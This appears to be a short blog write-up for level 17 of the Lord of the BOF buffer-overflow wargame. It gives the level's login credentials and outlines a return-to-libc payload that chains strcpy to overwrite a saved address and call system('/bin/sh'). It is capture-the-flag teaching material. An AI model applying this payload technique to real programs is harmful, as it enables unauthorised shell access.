
[LOB]level17 succubus

M0ca 2018. 1. 20. 06:22

ID:succubus

PW:here to stay


Check the address of strcpy (&strcpy): 0x8048410.

strcpy takes two parameters (dest, src).


strcpy's return address is "AAAA".

So use strcpy to change the address at ebp+48.

dest is ebp+48. src is the address that executes the shell, which can be put in the buffer, argv[1], or anywhere else.


payload

buffer (libc_system + system's ret + &/bin/sh + "\x90"*32) + &strcpy + "AAAA" (fixed) + &(ebp+48 - AAAA) + &buffer

The address at ebp+48 is changed to the buffer's address.

eip then executes system("/bin/sh"). Get the address of /bin/sh using getenv.


exploit
